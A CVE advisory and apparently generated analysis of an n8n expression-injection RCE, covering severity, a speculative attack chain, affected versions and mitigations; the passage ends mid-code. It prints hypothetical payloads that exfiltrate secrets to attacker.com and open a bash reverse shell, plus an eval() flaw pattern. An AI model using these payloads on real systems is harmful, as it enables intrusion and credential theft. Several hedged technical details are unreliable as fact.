CVE-2026-25049
CVE-2026-25049
Weakness (CWE)
CVSS Vector
v4.0- Attack Vector
- Network
- Attack Complexity
- Low
- Attack Requirements
- None
- Privileges Required
- Low
- User Interaction
- None
- Confidentiality (Vulnerable)
- High
- Integrity (Vulnerable)
- High
- Availability (Vulnerable)
- High
- Confidentiality (Subsequent)
- High
- Integrity (Subsequent)
- High
- Availability (Subsequent)
- High
Description
n8n is an open source workflow automation platform. Prior to versions 1.123.17 and 2.5.2, an authenticated user with permission to create or modify workflows could abuse crafted expressions in workflow parameters to trigger unintended system command execution on the host running n8n. This issue has been patched in versions 1.123.17 and 2.5.2.
CVE-2026-25049: Professional Cybersecurity Analysis
Executive Summary
CVE-2026-25049 represents a critical remote code execution (RCE) vulnerability in n8n workflow automation platform with a CVSS score of 9.9. The vulnerability allows authenticated users with workflow creation/modification privileges to execute arbitrary system commands through crafted expressions, posing severe risks to organizational infrastructure.
1. Vulnerability Assessment and Severity Evaluation
Severity Classification
- CVSS Score: 9.9 (Critical)
- Attack Complexity: Low
- Privileges Required: Low (authenticated user)
- User Interaction: None
- Scope: Changed (likely affects resources beyond the vulnerable component)
Technical Assessment
This vulnerability represents an expression injection leading to command injection, a class of vulnerabilities that bypasses input validation mechanisms. The critical severity is justified by:
- Direct system command execution on the host infrastructure
- Authenticated but low-privilege exploitation (any user with workflow permissions)
- Potential for lateral movement within the network
- Data exfiltration capabilities
- Complete system compromise potential
The 9.9 score suggests impacts across confidentiality, integrity, and availability with scope change, indicating the vulnerability can affect resources beyond the application itself.
2. Attack Vectors and Exploitation Methods
Primary Attack Vector
Authenticated Expression Injection → Command Execution
Exploitation Methodology
Attack Chain:
1. Attacker authenticates with valid credentials
2. Creates or modifies workflow with malicious expressions
3. Crafted expressions bypass sanitization
4. Expression evaluation triggers system command execution
5. Commands execute with n8n process privileges
Likely Exploitation Techniques
Expression Injection Patterns:
- Template injection in workflow parameters
- Code evaluation through expression parsers (e.g., JavaScript eval, template engines)
- Abuse of built-in functions that interact with the operating system
- Prototype pollution leading to command execution
Example Attack Scenarios:
// Hypothetical malicious workflow expression
{{ system.exec('curl attacker.com/exfil?data=' + env.secrets) }}
// Or through Node.js child_process
{{ require('child_process').exec('bash -i >& /dev/tcp/attacker.com/4444 0>&1') }}
Attack Prerequisites
- Valid user credentials with workflow creation/modification permissions
- Network access to n8n instance
- Knowledge of n8n's expression syntax
Post-Exploitation Capabilities
- Reverse shell establishment
- Credential harvesting (database credentials, API keys, environment variables)
- Lateral movement to connected systems
- Data exfiltration from workflows and databases
- Persistence mechanisms through workflow modifications
- Supply chain attacks via compromised automation workflows
3. Affected Systems and Software Versions
Vulnerable Versions
- n8n versions < 1.123.17 (Version 1.x branch)
- n8n versions < 2.5.2 (Version 2.x branch)
Affected Deployment Scenarios
- Self-hosted installations (Docker, Kubernetes, bare metal)
- Cloud deployments (AWS, Azure, GCP)
- Enterprise on-premises installations
- Development and staging environments
Platform Considerations
- Operating Systems: Linux, Windows, macOS (all platforms running n8n)
- Container environments: Docker containers with host access
- Orchestration platforms: Kubernetes clusters
Dependency Chain Risks
n8n's architecture typically includes:
- Node.js runtime (potential privilege escalation)
- Database systems (PostgreSQL, MySQL, SQLite)
- Connected third-party services via integrations
- Message queues and caching systems
4. Recommended Mitigation Strategies
Immediate Actions (Priority 1)
1. Emergency Patching
# For version 1.x users
npm update n8n@1.123.17
# For version 2.x users
npm update n8n@2.5.2
# Docker users
docker pull n8nio/n8n:1.123.17
# or
docker pull n8nio/n8n:2.5.2
2. Access Control Audit
- Review all users with workflow creation/modification permissions
- Implement principle of least privilege
- Revoke unnecessary workflow permissions
- Enable multi-factor authentication (MFA) for all accounts
3. Incident Response Activities
- Review workflow modification logs for suspicious activity
- Audit existing workflows for malicious expressions
- Check system logs for unexpected command executions
- Monitor outbound network connections for data exfiltration
Short-term Mitigations (Priority 2)
1. Network Segmentation
Implement network controls:
- Isolate n8n instances in dedicated VLANs
- Restrict outbound connections to required services only
- Deploy Web Application Firewall (WAF) rules
- Enable egress filtering
2. Enhanced Monitoring
Deploy detection mechanisms:
- SIEM rules for unusual process spawning
- File integrity monitoring on n8n directories
- Network traffic analysis for C2 patterns
- Workflow change alerting
3. Runtime Protection
- Deploy application security monitoring (RASP/IAST)
- Implement container security policies (AppArmor, SELinux)
- Use seccomp profiles to restrict system calls
- Enable read-only file systems where possible
Long-term Security Enhancements (Priority 3)
1. Architecture Hardening
- Run n8n with minimal privileges (non-root user)
- Implement sandboxing for workflow execution
- Deploy in isolated container environments
- Use security contexts in Kubernetes
2. Security Operations
- Establish regular vulnerability scanning schedules
- Implement automated patch management
- Conduct periodic security assessments
- Develop workflow security review processes
3. Governance and Compliance
- Create workflow approval workflows for production
- Implement code review for complex workflows
- Establish security baselines and hardening guides
- Document incident response procedures
Compensating Controls (If Patching Delayed)
Temporary Mitigations:
1. Disable workflow creation for non-essential users
2. Implement strict egress firewall rules
3. Deploy runtime application self-protection (RASP)
4. Enable comprehensive audit logging
5. Implement workflow approval processes
6. Restrict n8n to internal networks only
5. Impact on Cybersecurity Landscape
Industry-Wide Implications
1. Workflow Automation Security Concerns
- Highlights risks in low-code/no-code platforms
- Demonstrates expression language security challenges
- Raises awareness of automation platform attack surfaces
2. Supply Chain Risks
- Compromised workflows can affect downstream systems
- Automated processes become attack vectors
- Trust boundaries in integration platforms
3. Insider Threat Considerations
- Low privilege requirements increase insider threat risks
- Legitimate functionality abused for malicious purposes
- Challenges in distinguishing malicious from legitimate workflows
Broader Security Trends
1. Expression Language Vulnerabilities Similar vulnerabilities have affected:
- Template engines (Jinja2, Handlebars, Velocity)
- Workflow platforms (Apache Airflow, Zapier alternatives)
- Configuration management tools
2. Authentication ≠ Authorization Reinforces the principle that authenticated access doesn't guarantee safe operations without proper input validation and sandboxing.
3. Open Source Security
- Demonstrates importance of security audits in OSS projects
- Highlights responsible disclosure effectiveness
- Shows value of active security maintenance
Threat Actor Interest
High-value targets for:
- APT groups: For persistence and lateral movement
- Ransomware operators: For credential harvesting and deployment
- Insider threats: Low technical barrier to exploitation
- Supply chain attackers: Compromise automation workflows affecting multiple organizations
6. Technical Details for Security Professionals
Vulnerability Mechanics
Root Cause Analysis: The vulnerability likely stems from insufficient sanitization of user-supplied expressions before evaluation in a context that allows system command execution.
Common Implementation Flaws:
// VULNERABLE PATTERN (hypothetical)
function evaluateExpression(expression, context) {
// Direct evaluation without sanitization
return eval(expression); // or vm.runIn